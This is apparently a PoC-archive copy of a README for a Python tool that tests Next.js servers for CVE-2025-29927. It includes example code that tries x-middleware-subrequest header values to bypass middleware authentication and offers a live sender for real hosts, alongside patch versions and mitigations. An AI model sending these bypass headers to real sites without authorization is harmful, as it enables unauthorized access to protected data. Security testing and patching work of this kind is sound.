Related vulnerability
Description
Simple script to attempt a bypass on a server possibly vulnerable to CVE-2025-29927 (Next.js middleware)
Introduction
# MiddleForce
<div align="center">
<img src="https://img.shields.io/badge/Python-3.x-blue.svg" alt="Python 3.x">
<img src="https://img.shields.io/badge/License-MIT-green.svg" alt="License MIT">
<img src="https://img.shields.io/badge/CVE-2025--29927-red.svg" alt="CVE-2025-29927">
</div>
## 🔍 Overview
MiddleForce is a specialized security testing tool designed to detect and exploit the CVE-2025-29927 vulnerability in Next.js middleware. This tool helps security professionals identify applications vulnerable to middleware bypass attacks.
## 🚀 Features
- **Middleware Bypass Detection**: Automatically tests for Next.js middleware bypass vulnerabilities
- **Colored Output**: Clear visual indicators for vulnerable and non-vulnerable routes
- **Simple CLI Interface**: Easy-to-use command line arguments
- **Multiple Headers Testing**: Tests various bypass techniques
## 📋 Requirements
- Python 3.x
- Required packages (listed in `requirements.txt`):
  - colorama
  - requests
  - argparse (part of the Python standard library; no separate install is needed)
## 💻 Installation
### Automatic Installation (Linux)
```bash
git clone https://github.com/diogolourencodev/middleforce.git
cd middleforce
chmod +x install.sh
./install.sh
```
### Manual Installation
```bash
git clone https://github.com/diogolourencodev/middleforce.git
cd middleforce
pip install -r requirements.txt
```
## 🔧 Usage
```bash
# Basic usage
python3 middleforce.py -t http://example.com/api/dashboard
# If installed globally on Linux
middleforce -t http://example.com/api/dashboard
```
## 📊 Output Interpretation
- **Green Output**: Vulnerable route detected - the request with the bypass header was accepted where the plain request was not
- **Red Output**: Not vulnerable - either the route is public (nothing to bypass) or the middleware rejected the request despite the header
- **Cyan Output**: Informational messages or unexpected responses (confirm these manually before drawing conclusions)
## 🔒 Security Implications
CVE-2025-29927 lets an unauthenticated client skip Next.js middleware by sending the `x-middleware-subrequest` header, which Next.js used internally to mark its own sub-requests and stop middleware from recursing. Because the header was trusted on external requests, any control implemented only in middleware (authentication, authorization, redirects to a login page, security headers) can be bypassed, giving unauthorized access to protected routes, API endpoints, and sensitive data. The issue is fixed in Next.js 15.2.3, 14.2.25, 13.5.9, and 12.3.5; self-hosted deployments that cannot upgrade immediately should strip the header at the reverse proxy or WAF, and no deployment should rely on middleware as its only authorization layer.
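The following is an added example, not MiddleForce's own code, showing the comparison logic such a check relies on: request the route once without the header and once per candidate `x-middleware-subrequest` value, without following redirects, and call it vulnerable only when a protected baseline (redirect, 401 or 403) turns into a 200. The candidate values are the ones commonly reported for this CVE (an unversioned middleware name for older releases, and the name repeated five times with colons for newer ones) and are illustrative, not exhaustive; the fake servers, status codes and URLs are constructed for offline use. The `send` callable is injected so the same logic runs against a real target through `requests` or against the constructed stand-ins.

```python
"""Offline demonstration of the CVE-2025-29927 bypass check (example code, not MiddleForce's)."""
from typing import Callable, Dict, Optional, Tuple

# Header Next.js used to mark its own internal sub-requests; pre-patch versions
# skipped middleware whenever an external request carried it.
BYPASS_HEADER = "x-middleware-subrequest"

# Commonly reported header values. Newer releases required the middleware name
# repeated up to the recursion-depth limit, joined with colons.
# Assumption: this list is illustrative and may not cover every layout.
CANDIDATE_VALUES = [
    "pages/_middleware",
    "middleware",
    "src/middleware",
    ":".join(["middleware"] * 5),
    ":".join(["src/middleware"] * 5),
]

# Responses that indicate middleware (or the app) refused or redirected the request.
PROTECTED_STATUSES = {301, 302, 303, 307, 308, 401, 403}

# A sender takes (url, headers) and returns the HTTP status code, redirects NOT followed.
Sender = Callable[[str, Dict[str, str]], int]


def looks_protected(status: int) -> bool:
    return status in PROTECTED_STATUSES


def classify(baseline: int, with_header: int) -> str:
    """Compare the plain request's status with the same request plus the bypass header."""
    if not looks_protected(baseline):
        return "public"  # nothing to bypass: the route is already reachable
    if with_header == 200:
        return "vulnerable"  # the header turned a refusal into success
    if looks_protected(with_header):
        return "protected"  # middleware still enforced its decision
    return "inconclusive"  # e.g. 404/500: inspect manually


def probe_route(url: str, send: Sender) -> Tuple[str, Optional[str]]:
    """Return (verdict, header value that worked or None) for one route."""
    baseline = send(url, {})
    if not looks_protected(baseline):
        return "public", None
    for value in CANDIDATE_VALUES:
        status = send(url, {BYPASS_HEADER: value})
        if classify(baseline, status) == "vulnerable":
            return "vulnerable", value
    return "protected", None


def requests_sender(url: str, headers: Dict[str, str]) -> int:
    """Live sender for real targets; redirects must not be followed or a 307 to /login reads as 200."""
    import requests  # imported lazily so the offline demo needs no network library

    return requests.get(url, headers=headers, allow_redirects=False, timeout=10).status_code


# Constructed stand-in for an unpatched Next.js 15 deployment: it redirects to a
# login page unless the header carries the five-times-repeated middleware name.
def fake_vulnerable_server(url: str, headers: Dict[str, str]) -> int:
    if headers.get(BYPASS_HEADER) == ":".join(["middleware"] * 5):
        return 200
    return 307


# Constructed stand-in for a patched deployment: the header is ignored.
def fake_patched_server(url: str, headers: Dict[str, str]) -> int:
    return 307


# Constructed stand-in for a route that is public anyway (no middleware decision to bypass).
def fake_public_server(url: str, headers: Dict[str, str]) -> int:
    return 200


if __name__ == "__main__":
    target = "http://example.com/api/dashboard"  # constructed URL
    for name, srv in [("vulnerable", fake_vulnerable_server),
                      ("patched", fake_patched_server),
                      ("public", fake_public_server)]:
        print(name, "->", probe_route(target, srv))
```

Swap `fake_vulnerable_server` for `requests_sender` to run against a real host; the `allow_redirects=False` setting is what keeps a login redirect from being misread as a successful bypass.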
## 🤝 Contributing
Contributions are welcome! Feel free to submit pull requests or open issues to improve the tool.
## 👤 Author
Created by [Diogo Lourenço](https://github.com/diogolourencodev)
---
<div align="center">
<p>If you found this tool useful, please consider giving it a star ⭐</p>
</div>
File snapshot
[4.0K] /data/pocs/5c3a3574225c510bb5a153e7b9a0fe85c3c52d59
├── [ 240] install.sh
├── [3.1K] middleforce.py
├── [2.3K] README.md
└── [ 28] requirements.txt
0 directories, 4 files
Notes
1. Accessing the code through the original source is recommended.
2. If the source is unavailable or inaccessible, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.